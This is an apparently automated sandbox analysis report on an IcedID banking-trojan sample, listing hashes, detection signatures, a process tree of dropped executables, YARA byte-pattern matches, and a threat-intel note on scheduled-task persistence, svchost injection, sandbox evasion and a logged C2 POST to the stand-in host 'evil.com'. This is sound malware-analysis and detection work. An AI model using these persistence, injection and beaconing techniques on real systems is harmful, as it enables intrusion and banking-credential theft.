Edit tour

Windows Analysis Report
GziaFibS0d.exe

Overview

General Information

Sample Name:	GziaFibS0d.exe
Original Sample Name:	dcddc1610068a8485efe1dfaee14100e.exe
Analysis ID:	1316288
MD5:	dcddc1610068a8485efe1dfaee14100e
SHA1:	57f4554865be404ccd1be88cc1b8166895bc9355
SHA256:	2673588603fc2203117206d4a318eb7aa20bd88c94342f27cb9207e56216c186
Tags:	exe
Infos:

Detection

IcedID

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Multi AV Scanner detection for submitted file

Malicious sample detected (through community Yara rule)

Detected unpacking (overwrites its own PE header)

Antivirus / Scanner detection for submitted sample

Detected unpacking (changes PE section rights)

Antivirus detection for dropped file

Yara detected IcedID

Overwrites code with unconditional jumps - possibly settings hooks in foreign process

Writes to foreign memory regions

Hijacks the control flow in another process

Machine Learning detection for sample

Allocates memory in foreign processes

Tries to detect virtualization through RDTSC time measurements

Machine Learning detection for dropped file

Contains functionality to compare user and computer (likely to detect sandboxes)

Contains functionality to detect hardware virtualization (CPUID execution measurement)

Uses 32bit PE files

Yara signature match

Drops PE files to the application program directory (C:\ProgramData)

Contains functionality to query locales information (e.g. system language)

May sleep (evasive loops) to hinder dynamic analysis

Uses code obfuscation techniques (call, push, ret)

Creates COM task schedule object (often to register a task for autostart)

Found evasive API chain (date check)

Detected potential crypto function

Contains functionality to launch a process as a different user

Sample execution stops while process was sleeping (likely an evasion)

Found evasive API chain (may stop execution after checking a module file name)

Contains functionality to call native functions

Contains functionality to dynamically determine API calls

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains functionality for execution timing, often used to detect debuggers

Contains long sleeps (>= 3 min)

Sample file is different than original file name gathered from version info

Drops PE files

Tries to load missing DLLs

Contains functionality to read the PEB

Found evasive API chain checking for process token information

Uses Microsoft's Enhanced Cryptographic Provider

Classification

Process Tree

System is w10x64

GziaFibS0d.exe (PID: 7020 cmdline: C:\Users\user\Desktop\GziaFibS0d.exe MD5: DCDDC1610068A8485EFE1DFAEE14100E)

svchost.exe (PID: 6232 cmdline: C:\Windows\system32\svchost.exe MD5: B7C999040D80E5BF87886D70D992C51E)

rencz.exe (PID: 6540 cmdline: C:\ProgramData\{CF5104B8-9BB8-4B0C-8E6F-04A1D679738F}\rencz.exe MD5: 7D89FA6EE789062519618AB3B4236BEE)

svchost.exe (PID: 6860 cmdline: C:\Windows\system32\svchost.exe MD5: B7C999040D80E5BF87886D70D992C51E)

tsuvgo.exe (PID: 2436 cmdline: C:\ProgramData\{D667E8A3-90A3-4407-AE7D-72E02EB22AAF}\tsuvgo.exe MD5: D94EEE493DE5FB08F29D5292973CFFB8)

svchost.exe (PID: 5944 cmdline: C:\Windows\system32\svchost.exe MD5: B7C999040D80E5BF87886D70D992C51E)

zipdk.exe (PID: 1076 cmdline: C:\ProgramData\{DDA53BE8-33E8-48D8-9C7F-481456EC1549}\zipdk.exe MD5: 48FB41F7CF7787A43B1A90782E9F6DE2)

svchost.exe (PID: 6344 cmdline: C:\Windows\system32\svchost.exe MD5: B7C999040D80E5BF87886D70D992C51E)

tfykdkdkdk.exe (PID: 6408 cmdline: C:\ProgramData\{644E25B7-1AB7-434C-BD0A-D6B1CB215C97}\tfykdkdkdk.exe MD5: 2A114987A9C3FE717FD6DF2A44C89F1F)

svchost.exe (PID: 3320 cmdline: C:\Windows\system32\svchost.exe MD5: B7C999040D80E5BF87886D70D992C51E)

ayxuiczvtsui.exe (PID: 6740 cmdline: C:\ProgramData\{6B82AE99-8B99-4584-91C5-1F3FDB5B00DE}\ayxuiczvtsui.exe MD5: 38B4A6BB5079BAF60A6BC01BFB016449)

svchost.exe (PID: 5876 cmdline: C:\Windows\system32\svchost.exe MD5: B7C999040D80E5BF87886D70D992C51E)

ziczv.exe (PID: 3772 cmdline: C:\ProgramData\{73B44980-FF80-4C3E-8939-38EE139C8DB6}\ziczv.exe MD5: 78B74716214690CD7677CD2596C4E1A6)

svchost.exe (PID: 5056 cmdline: C:\Windows\system32\svchost.exe MD5: B7C999040D80E5BF87886D70D992C51E)

uvtsuvts.exe (PID: 1584 cmdline: C:\ProgramData\{7AA51DDD-2DDD-4155-A746-4633FBD41458}\uvtsuvts.exe MD5: 78B74716214690CD7677CD2596C4E1A6)

svchost.exe (PID: 3712 cmdline: C:\Windows\system32\svchost.exe MD5: B7C999040D80E5BF87886D70D992C51E)

czipqtsh.exe (PID: 2904 cmdline: C:\ProgramData\{812C3E65-7165-4977-8E9B-B83C3C084D5D}\czipqtsh.exe MD5: 78B74716214690CD7677CD2596C4E1A6)

svchost.exe (PID: 6728 cmdline: C:\Windows\system32\svchost.exe MD5: B7C999040D80E5BF87886D70D992C51E)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
IcedID	Analysis Observations:* It sets up persistence by creating a Scheduled Task with the following characteristics: * Name: Update * Trigger: At Log on * Action: %LocalAppData%\$Example\\waroupada.exe /i * Conditions: Stop if the computer ceases to be idle.* The sub-directory within %LocalAppdata%, Appears to be randomly picked from the list of directories within %ProgramFiles%. This needs more verification.* The filename remained static during analysis.* The original malware exe (ex. waroupada.exe) will spawn an instance of svchost.exe as a sub-process and then inject/execute its malicious code within it* If /i is not passed as an argument, it sets up persistence and waits for reboot.* If /I is passed as an argument (as is the case when the scheduled task is triggered at login), it skips persistence setup and actually executes; resulting in C2 communication.* Employs an interesting method for sleeping by calling the Sleep function of kernel32.dll from the shell, like so: rundll32.exe kernel32,Sleep -s* Setup a local listener to proxy traffic on 127.0.0.1:50000[Example Log from C2 Network Communication][2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] connect[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] recv: POST /forum/posting.php?a=0&b=4FC0302F4C59D8CDB8&d=0&e=63&f=0&g=0&h=0&r=0&i=266390&j=11 HTTP/1.1[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] recv: Connection: close[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] recv: Content-Type: application/x-www-form-urlencoded[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] recv: Content-Length: 196[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] recv: Host: evil.com[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] recv: <(POSTDATA)>[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] info: POST data stored to: /var/lib/inetsim/http/postdata/a90b931cb23df85aa6e3f0039958b031c3b053a2[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] info: Request URL: hxxps://evil.com/forum/posting.php?a=0&b=4FC0302F4C59D8CDB8&d=0&e=63&f=0&g=0&h=0&r=0&i=266390&j=11[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] info: Sending fake file configured for extension 'php'.[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] send: HTTP/1.1 200 OK[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] send: Content-Type: text/html[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] send: Server: INetSim HTTPs Server[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] send: Date: Mon, 19 Mar 2018 16:45:55 GMT[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] send: Connection: Close[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] send: Content-Length: 258[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] info: Sending file: /var/lib/inetsim/http/fakefiles/sample.html[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] stat: 1 method=POST url=hxxps://evil.com/forum/posting.php?a=0&b=4FC0302F4C59D8CDB8&d=0&e=63&f=0&g=0&h=0&r=0&i=266390&j=11 sent=/var/lib/inetsim/http/fakefiles/sample.html postdata=/var/lib/inetsim/http/postdata/a90b931cb23df85aa6e3f0039958b031c3b053a2	GOLD CABIN Lunar Spider	http://www.intezer.com/icedid-banking-trojan-shares-code-pony-2-0-trojan/ https://0xc0decafe.com/malware-analyst-guide-to-pe-timestamps/ https://4rchib4ld.github.io/blog/IcedIDOnMyNeckImTheCoolest/ https://aaqeel01.wordpress.com/2021/04/09/icedid-analysis/ https://awakesecurity.com/blog/detecting-icedid-and-cobalt-strike-beacon-with-network-detection-and-response/	https://malpedia.caad.fkie.fraunhofer.de/details/win.icedid

Malware Configuration

⊘No configs have been found

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000006.00000003.1477441952.0000000000630000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_IcedID_3	Yara detected IcedID	Joe Security
00000006.00000003.1477441952.0000000000630000.00000040.00001000.00020000.00000000.sdmp	IcedID	IcedID Payload	kevoreilly	0x7373:$crypt2: 8B 44 24 04 D1 C8 F7 D0 D1 C8 2D 20 01 00 00 D1 C0 F7 D0 2D 01 91 00 00 C3
00000016.00000003.2450165604.0000000000710000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_IcedID_3	Yara detected IcedID	Joe Security
00000016.00000003.2450165604.0000000000710000.00000040.00001000.00020000.00000000.sdmp	IcedID	IcedID Payload	kevoreilly	0x7373:$crypt2: 8B 44 24 04 D1 C8 F7 D0 D1 C8 2D 20 01 00 00 D1 C0 F7 D0 2D 01 91 00 00 C3
00000015.00000002.3296339935.0000000002F71000.00000020.00000400.00020000.00000000.sdmp	JoeSecurity_IcedID_3	Yara detected IcedID	Joe Security
00000015.00000002.3296339935.0000000002F71000.00000020.00000400.00020000.00000000.sdmp	IcedID	IcedID Payload	kevoreilly	0x47b4:$crypt2: 8B 44 24 04 D1 C8 F7 D0 D1 C8 2D 20 01 00 00 D1 C0 F7 D0 2D 01 91 00 00 C3 0xf1e:$major_ver: 0F B6 05 A8 62 F7 02 6A 68 6A 72 FF 75 0C 6A 70 50 FF 35 A0 62 F7 02 8D 45 80 FF 35 A4 62 F7 02 6A 63 FF 75 08 6A 67 50 FF 75 10 FF 15 7C 71 F7 02 83 C4 38 8B E5 5D C3
00000006.00000002.1478560194.000000000073A000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_IcedID_3	Yara detected IcedID	Joe Security
00000006.00000002.1478560194.000000000073A000.00000004.00000020.00020000.00000000.sdmp	IcedID	IcedID Payload	kevoreilly	0x5efc:$crypt2: 8B 44 24 04 D1 C8 F7 D0 D1 C8 2D 20 01 00 00 D1 C0 F7 D0 2D 01 91 00 00 C3 0x2666:$major_ver: 0F B6 05 A8 62 7E 02 6A 68 6A 72 FF 75 0C 6A 70 50 FF 35 A0 62 7E 02 8D 45 80 FF 35 A4 62 7E 02 6A 63 FF 75 08 6A 67 50 FF 75 10 FF 15 7C 71 7E 02 83 C4 38 8B E5 5D C3
00000016.00000002.2451300303.0000000000401000.00000020.00000001.01000000.0000000A.sdmp	JoeSecurity_IcedID_3	Yara detected IcedID	Joe Security
00000016.00000002.2451300303.0000000000401000.00000020.00000001.01000000.0000000A.sdmp	IcedID	IcedID Payload	kevoreilly	0xe31:$crypt2: 8B 44 24 04 D1 C8 F7 D0 D1 C8 2D 20 01 00 00 D1 C0 F7 D0 2D 01 91 00 00 C3
00000010.00000002.1725192605.000000000058A000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_IcedID_3	Yara detected IcedID	Joe Security
00000010.00000002.1725192605.000000000058A000.00000004.00000020.00020000.00000000.sdmp	IcedID	IcedID Payload	kevoreilly	0x5dec:$crypt2: 8B 44 24 04 D1 C8 F7 D0 D1 C8 2D 20 01 00 00 D1 C0 F7 D0 2D 01 91 00 00 C3 0x2556:$major_ver: 0F B6 05 A8 62 EC 02 6A 68 6A 72 FF 75 0C 6A 70 50 FF 35 A0 62 EC 02 8D 45 80 FF 35 A4 62 EC 02 6A 63 FF 75 08 6A 67 50 FF 75 10 FF 15 7C 71 EC 02 83 C4 38 8B E5 5D C3
00000006.00000002.1478197214.0000000000401000.00000020.00000001.01000000.00000006.sdmp	JoeSecurity_IcedID_3	Yara detected IcedID	Joe Security
00000006.00000002.1478197214.0000000000401000.00000020.00000001.01000000.00000006.sdmp	IcedID	IcedID Payload	kevoreilly	0xe31:$crypt2: 8B 44 24 04 D1 C8 F7 D0 D1 C8 2D 20 01 00 00 D1 C0 F7 D0 2D 01 91 00 00 C3
00000018.00000003.2700767215.00000000005C0000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_IcedID_3	Yara detected IcedID	Joe Security
00000018.00000003.2700767215.00000000005C0000.00000040.00001000.00020000.00000000.sdmp	IcedID	IcedID Payload	kevoreilly	0x7373:$crypt2: 8B 44 24 04 D1 C8 F7 D0 D1 C8 2D 20 01 00 00 D1 C0 F7 D0 2D 01 91 00 00 C3
00000012.00000003.1951491009.0000000000540000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_IcedID_3	Yara detected IcedID	Joe Security
00000012.00000003.1951491009.0000000000540000.00000040.00001000.00020000.00000000.sdmp	IcedID	IcedID Payload	kevoreilly	0x7373:$crypt2: 8B 44 24 04 D1 C8 F7 D0 D1 C8 2D 20 01 00 00 D1 C0 F7 D0 2D 01 91 00 00 C3
00000014.00000002.2218733852.00000000006AA000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_IcedID_3	Yara detected IcedID	Joe Security
00000014.00000002.2218733852.00000000006AA000.00000004.00000020.00020000.00000000.sdmp	IcedID	IcedID Payload	kevoreilly	0x5ea4:$crypt2: 8B 44 24 04 D1 C8 F7 D0 D1 C8 2D 20 01 00 00 D1 C0 F7 D0 2D 01 91 00 00 C3 0x260e:$major_ver: 0F B6 05 A8 62 F7 02 6A 68 6A 72 FF 75 0C 6A 70 50 FF 35 A0 62 F7 02 8D 45 80 FF 35 A4 62 F7 02 6A 63 FF 75 08 6A 67 50 FF 75 10 FF 15 7C 71 F7 02 83 C4 38 8B E5 5D C3
00000004.00000003.1250459151.0000000000710000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_IcedID_3	Yara detected IcedID	Joe Security
00000004.00000003.1250459151.0000000000710000.00000040.00001000.00020000.00000000.sdmp	IcedID	IcedID Payload	kevoreilly	0x7373:$crypt2: 8B 44 24 04 D1 C8 F7 D0 D1 C8 2D 20 01 00 00 D1 C0 F7 D0 2D 01 91 00 00 C3
00000005.00000002.3296224189.0000000002691000.00000020.00000400.00020000.00000000.sdmp	JoeSecurity_IcedID_3	Yara detected IcedID	Joe Security
00000005.00000002.3296224189.0000000002691000.00000020.00000400.00020000.00000000.sdmp	IcedID	IcedID Payload	kevoreilly	0x47b4:$crypt2: 8B 44 24 04 D1 C8 F7 D0 D1 C8 2D 20 01 00 00 D1 C0 F7 D0 2D 01 91 00 00 C3 0xf1e:$major_ver: 0F B6 05 A8 62 69 02 6A 68 6A 72 FF 75 0C 6A 70 50 FF 35 A0 62 69 02 8D 45 80 FF 35 A4 62 69 02 6A 63 FF 75 08 6A 67 50 FF 75 10 FF 15 7C 71 69 02 83 C4 38 8B E5 5D C3
0000001B.00000002.2950973983.000000000061A000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_IcedID_3	Yara detected IcedID	Joe Security
0000001B.00000002.2950973983.000000000061A000.00000004.00000020.00020000.00000000.sdmp	IcedID	IcedID Payload	kevoreilly	0x5e74:$crypt2: 8B 44 24 04 D1 C8 F7 D0 D1 C8 2D 20 01 00 00 D1 C0 F7 D0 2D 01 91 00 00 C3 0x25de:$major_ver: 0F B6 05 A8 62 A5 02 6A 68 6A 72 FF 75 0C 6A 70 50 FF 35 A0 62 A5 02 8D 45 80 FF 35 A4 62 A5 02 6A 63 FF 75 08 6A 67 50 FF 75 10 FF 15 7C 71 A5 02 83 C4 38 8B E5 5D C3
00000012.00000002.1953164296.0000000000401000.00000020.00000001.01000000.00000008.sdmp	JoeSecurity_IcedID_3	Yara detected IcedID	Joe Security
00000012.00000002.1953164296.0000000000401000.00000020.00000001.01000000.00000008.sdmp	IcedID	IcedID Payload	kevoreilly	0xe31:$crypt2: 8B 44 24 04 D1 C8 F7 D0 D1 C8 2D 20 01 00 00 D1 C0 F7 D0 2D 01 91 00 00 C3
00000017.00000002.3295830268.0000000002891000.00000020.00000400.00020000.00000000.sdmp	JoeSecurity_IcedID_3	Yara detected IcedID	Joe Security
00000017.00000002.3295830268.0000000002891000.00000020.00000400.00020000.00000000.sdmp	IcedID	IcedID Payload	kevoreilly	0x47b4:$crypt2: 8B 44 24 04 D1 C8 F7 D0 D1 C8 2D 20 01 00 00 D1 C0 F7 D0 2D 01 91 00 00 C3 0xf1e:$major_ver: 0F B6 05 A8 62 89 02 6A 68 6A 72 FF 75 0C 6A 70 50 FF 35 A0 62 89 02 8D 45 80 FF 35 A4 62 89 02 6A 63 FF 75 08 6A 67 50 FF 75 10 FF 15 7C 71 89 02 83 C4 38 8B E5 5D C3
00000004.00000002.1251555372.000000000079A000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_IcedID_3	Yara detected IcedID	Joe Security
00000004.00000002.1251555372.000000000079A000.00000004.00000020.00020000.00000000.sdmp	IcedID	IcedID Payload	kevoreilly	0x6614:$crypt2: 8B 44 24 04 D1 C8 F7 D0 D1 C8 2D 20 01 00 00 D1 C0 F7 D0 2D 01 91 00 00 C3 0x2d7e:$major_ver: 0F B6 05 A8 62 69 02 6A 68 6A 72 FF 75 0C 6A 70 50 FF 35 A0 62 69 02 8D 45 80 FF 35 A4 62 69 02 6A 63 FF 75 08 6A 67 50 FF 75 10 FF 15 7C 71 69 02 83 C4 38 8B E5 5D C3
00000013.00000002.3296108419.0000000002AC1000.00000020.00000400.00020000.00000000.sdmp	JoeSecurity_IcedID_3	Yara detected IcedID	Joe Security
00000013.00000002.3296108419.0000000002AC1000.00000020.00000400.00020000.00000000.sdmp	IcedID	IcedID Payload	kevoreilly	0x47b4:$crypt2: 8B 44 24 04 D1 C8 F7 D0 D1 C8 2D 20 01 00 00 D1 C0 F7 D0 2D 01 91 00 00 C3 0xf1e:$major_ver: 0F B6 05 A8 62 AC 02 6A 68 6A 72 FF 75 0C 6A 70 50 FF 35 A0 62 AC 02 8D 45 80 FF 35 A4 62 AC 02 6A 63 FF 75 08 6A 67 50 FF 75 10 FF 15 7C 71 AC 02 83 C4 38 8B E5 5D C3
0000001A.00000002.3295811054.0000000002B11000.00000020.00000400.00020000.00000000.sdmp	JoeSecurity_IcedID_3	Yara detected IcedID	Joe Security
0000001A.00000002.3295811054.0000000002B11000.00000020.00000400.00020000.00000000.sdmp	IcedID	IcedID Payload	kevoreilly	0x47b4:$crypt2: 8B 44 24 04 D1 C8 F7 D0 D1 C8 2D 20 01 00 00 D1 C0 F7 D0 2D 01 91 00 00 C3 0xf1e:$major_ver: 0F B6 05 A8 62 B1 02 6A 68 6A 72 FF 75 0C 6A 70 50 FF 35 A0 62 B1 02 8D 45 80 FF 35 A4 62 B1 02 6A 63 FF 75 08 6A 67 50 FF 75 10 FF 15 7C 71 B1 02 83 C4 38 8B E5 5D C3
00000012.00000002.1953599695.00000000005CD000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_IcedID_3	Yara detected IcedID	Joe Security
00000012.00000002.1953599695.00000000005CD000.00000004.00000020.00020000.00000000.sdmp	IcedID	IcedID Payload	kevoreilly	0x151b5:$crypt2: 8B 44 24 04 D1 C8 F7 D0 D1 C8 2D 20 01 00 00 D1 C0 F7 D0 2D 01 91 00 00 C3 0x1191f:$major_ver: 0F B6 05 A8 62 00 10 6A 68 6A 72 FF 75 0C 6A 70 50 FF 35 A0 62 00 10 8D 45 80 FF 35 A4 62 00 10 6A 63 FF 75 08 6A 67 50 FF 75 10 FF 15 7C 71 00 10 83 C4 38 8B E5 5D C3
00000000.00000002.1024729856.000000000067D000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_IcedID_3	Yara detected IcedID	Joe Security
00000000.00000002.1024729856.000000000067D000.00000004.00000020.00020000.00000000.sdmp	IcedID	IcedID Payload	kevoreilly	0x1590d:$crypt2: 8B 44 24 04 D1 C8 F7 D0 D1 C8 2D 20 01 00 00 D1 C0 F7 D0 2D 01 91 00 00 C3 0x12077:$major_ver: 0F B6 05 A8 62 00 10 6A 68 6A 72 FF 75 0C 6A 70 50 FF 35 A0 62 00 10 8D 45 80 FF 35 A4 62 00 10 6A 63 FF 75 08 6A 67 50 FF 75 10 FF 15 7C 71 00 10 83 C4 38 8B E5 5D C3
0000001C.00000002.2951130325.0000000002A51000.00000020.00000400.00020000.00000000.sdmp	JoeSecurity_IcedID_3	Yara detected IcedID	Joe Security
0000001C.00000002.2951130325.0000000002A51000.00000020.00000400.00020000.00000000.sdmp	IcedID	IcedID Payload	kevoreilly	0x47b4:$crypt2: 8B 44 24 04 D1 C8 F7 D0 D1 C8 2D 20 01 00 00 D1 C0 F7 D0 2D 01 91 00 00 C3 0xf1e:$major_ver: 0F B6 05 A8 62 A5 02 6A 68 6A 72 FF 75 0C 6A 70 50 FF 35 A0 62 A5 02 8D 45 80 FF 35 A4 62 A5 02 6A 63 FF 75 08 6A 67 50 FF 75 10 FF 15 7C 71 A5 02 83 C4 38 8B E5 5D C3
00000004.00000002.1251180113.0000000000401000.00000020.00000001.01000000.00000005.sdmp	JoeSecurity_IcedID_3	Yara detected IcedID	Joe Security
00000004.00000002.1251180113.0000000000401000.00000020.00000001.01000000.00000005.sdmp	IcedID	IcedID Payload	kevoreilly	0xe31:$crypt2: 8B 44 24 04 D1 C8 F7 D0 D1 C8 2D 20 01 00 00 D1 C0 F7 D0 2D 01 91 00 00 C3
00000000.00000003.1022438413.0000000000610000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_IcedID_3	Yara detected IcedID	Joe Security
00000000.00000003.1022438413.0000000000610000.00000040.00001000.00020000.00000000.sdmp	IcedID	IcedID Payload	kevoreilly	0x7373:$crypt2: 8B 44 24 04 D1 C8 F7 D0 D1 C8 2D 20 01 00 00 D1 C0 F7 D0 2D 01 91 00 00 C3
00000012.00000002.1953599695.00000000005EA000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_IcedID_3	Yara detected IcedID	Joe Security
00000012.00000002.1953599695.00000000005EA000.00000004.00000020.00020000.00000000.sdmp	IcedID	IcedID Payload	kevoreilly	0x5e84:$crypt2: 8B 44 24 04 D1 C8 F7 D0 D1 C8 2D 20 01 00 00 D1 C0 F7 D0 2D 01 91 00 00 C3 0x25ee:$major_ver: 0F B6 05 A8 62 AC 02 6A 68 6A 72 FF 75 0C 6A 70 50 FF 35 A0 62 AC 02 8D 45 80 FF 35 A4 62 AC 02 6A 63 FF 75 08 6A 67 50 FF 75 10 FF 15 7C 71 AC 02 83 C4 38 8B E5 5D C3
00000010.00000002.1724669146.0000000000401000.00000020.00000001.01000000.00000007.sdmp	JoeSecurity_IcedID_3	Yara detected IcedID	Joe Security
00000010.00000002.1724669146.0000000000401000.00000020.00000001.01000000.00000007.sdmp	IcedID	IcedID Payload	kevoreilly	0xe31:$crypt2: 8B 44 24 04 D1 C8 F7 D0 D1 C8 2D 20 01 00 00 D1 C0 F7 D0 2D 01 91 00 00 C3
00000018.00000002.2702209444.00000000006FD000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_IcedID_3	Yara detected IcedID	Joe Security
00000018.00000002.2702209444.00000000006FD000.00000004.00000020.00020000.00000000.sdmp	IcedID	IcedID Payload	kevoreilly	0x151e5:$crypt2: 8B 44 24 04 D1 C8 F7 D0 D1 C8 2D 20 01 00 00 D1 C0 F7 D0 2D 01 91 00 00 C3 0x1194f:$major_ver: 0F B6 05 A8 62 00 10 6A 68 6A 72 FF 75 0C 6A 70 50 FF 35 A0 62 00 10 8D 45 80 FF 35 A4 62 00 10 6A 63 FF 75 08 6A 67 50 FF 75 10 FF 15 7C 71 00 10 83 C4 38 8B E5 5D C3
00000010.00000002.1725192605.000000000056D000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_IcedID_3	Yara detected IcedID	Joe Security
00000010.00000002.1725192605.000000000056D000.00000004.00000020.00020000.00000000.sdmp	IcedID	IcedID Payload	kevoreilly	0x1511d:$crypt2: 8B 44 24 04 D1 C8 F7 D0 D1 C8 2D 20 01 00 00 D1 C0 F7 D0 2D 01 91 00 00 C3 0x11887:$major_ver: 0F B6 05 A8 62 00 10 6A 68 6A 72 FF 75 0C 6A 70 50 FF 35 A0 62 00 10 8D 45 80 FF 35 A4 62 00 10 6A 63 FF 75 08 6A 67 50 FF 75 10 FF 15 7C 71 00 10 83 C4 38 8B E5 5D C3
00000014.00000002.2218293819.0000000000401000.00000020.00000001.01000000.00000009.sdmp	JoeSecurity_IcedID_3	Yara detected IcedID	Joe Security
00000014.00000002.2218293819.0000000000401000.00000020.00000001.01000000.00000009.sdmp	IcedID	IcedID Payload	kevoreilly	0xe31:$crypt2: 8B 44 24 04 D1 C8 F7 D0 D1 C8 2D 20 01 00 00 D1 C0 F7 D0 2D 01 91 00 00 C3
00000000.00000002.1024321997.0000000000401000.00000020.00000001.01000000.00000003.sdmp	JoeSecurity_IcedID_3	Yara detected IcedID	Joe Security
00000000.00000002.1024321997.0000000000401000.00000020.00000001.01000000.00000003.sdmp	IcedID	IcedID Payload	kevoreilly	0xe31:$crypt2: 8B 44 24 04 D1 C8 F7 D0 D1 C8 2D 20 01 00 00 D1 C0 F7 D0 2D 01 91 00 00 C3
0000000F.00000002.3295659551.00000000027E1000.00000020.00000400.00020000.00000000.sdmp	JoeSecurity_IcedID_3	Yara detected IcedID	Joe Security
0000000F.00000002.3295659551.00000000027E1000.00000020.00000400.00020000.00000000.sdmp	IcedID	IcedID Payload	kevoreilly	0x47b4:$crypt2: 8B 44 24 04 D1 C8 F7 D0 D1 C8 2D 20 01 00 00 D1 C0 F7 D0 2D 01 91 00 00 C3 0xf1e:$major_ver: 0F B6 05 A8 62 7E 02 6A 68 6A 72 FF 75 0C 6A 70 50 FF 35 A0 62 7E 02 8D 45 80 FF 35 A4 62 7E 02 6A 63 FF 75 08 6A 67 50 FF 75 10 FF 15 7C 71 7E 02 83 C4 38 8B E5 5D C3
00000018.00000002.2702209444.000000000071A000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_IcedID_3	Yara detected IcedID	Joe Security
00000018.00000002.2702209444.000000000071A000.00000004.00000020.00020000.00000000.sdmp	IcedID	IcedID Payload	kevoreilly	0x5eb4:$crypt2: 8B 44 24 04 D1 C8 F7 D0 D1 C8 2D 20 01 00 00 D1 C0 F7 D0 2D 01 91 00 00 C3 0x261e:$major_ver: 0F B6 05 A8 62 B1 02 6A 68 6A 72 FF 75 0C 6A 70 50 FF 35 A0 62 B1 02 8D 45 80 FF 35 A4 62 B1 02 6A 63 FF 75 08 6A 67 50 FF 75 10 FF 15 7C 71 B1 02 83 C4 38 8B E5 5D C3
0000001B.00000003.2949720196.00000000020B0000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_IcedID_3	Yara detected IcedID	Joe Security
0000001B.00000003.2949720196.00000000020B0000.00000040.00001000.00020000.00000000.sdmp	IcedID	IcedID Payload	kevoreilly	0x7373:$crypt2: 8B 44 24 04 D1 C8 F7 D0 D1 C8 2D 20 01 00 00 D1 C0 F7 D0 2D 01 91 00 00 C3
0000001B.00000002.2950589703.0000000000401000.00000020.00000001.01000000.0000000C.sdmp	JoeSecurity_IcedID_3	Yara detected IcedID	Joe Security
0000001B.00000002.2950589703.0000000000401000.00000020.00000001.01000000.0000000C.sdmp	IcedID	IcedID Payload	kevoreilly	0xe31:$crypt2: 8B 44 24 04 D1 C8 F7 D0 D1 C8 2D 20 01 00 00 D1 C0 F7 D0 2D 01 91 00 00 C3
00000014.00000003.2217134294.0000000000610000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_IcedID_3	Yara detected IcedID	Joe Security
00000014.00000003.2217134294.0000000000610000.00000040.00001000.00020000.00000000.sdmp	IcedID	IcedID Payload	kevoreilly	0x7373:$crypt2: 8B 44 24 04 D1 C8 F7 D0 D1 C8 2D 20 01 00 00 D1 C0 F7 D0 2D 01 91 00 00 C3
00000006.00000002.1478560194.000000000071D000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_IcedID_3	Yara detected IcedID	Joe Security
00000006.00000002.1478560194.000000000071D000.00000004.00000020.00020000.00000000.sdmp	IcedID	IcedID Payload	kevoreilly	0x1522d:$crypt2: 8B 44 24 04 D1 C8 F7 D0 D1 C8 2D 20 01 00 00 D1 C0 F7 D0 2D 01 91 00 00 C3 0x11997:$major_ver: 0F B6 05 A8 62 00 10 6A 68 6A 72 FF 75 0C 6A 70 50 FF 35 A0 62 00 10 8D 45 80 FF 35 A4 62 00 10 6A 63 FF 75 08 6A 67 50 FF 75 10 FF 15 7C 71 00 10 83 C4 38 8B E5 5D C3
00000004.00000002.1251555372.000000000077D000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_IcedID_3	Yara detected IcedID	Joe Security
00000004.00000002.1251555372.000000000077D000.00000004.00000020.00020000.00000000.sdmp	IcedID	IcedID Payload	kevoreilly	0x15945:$crypt2: 8B 44 24 04 D1 C8 F7 D0 D1 C8 2D 20 01 00 00 D1 C0 F7 D0 2D 01 91 00 00 C3 0x120af:$major_ver: 0F B6 05 A8 62 00 10 6A 68 6A 72 FF 75 0C 6A 70 50 FF 35 A0 62 00 10 8D 45 80 FF 35 A4 62 00 10 6A 63 FF 75 08 6A 67 50 FF 75 10 FF 15 7C 71 00 10 83 C4 38 8B E5 5D C3
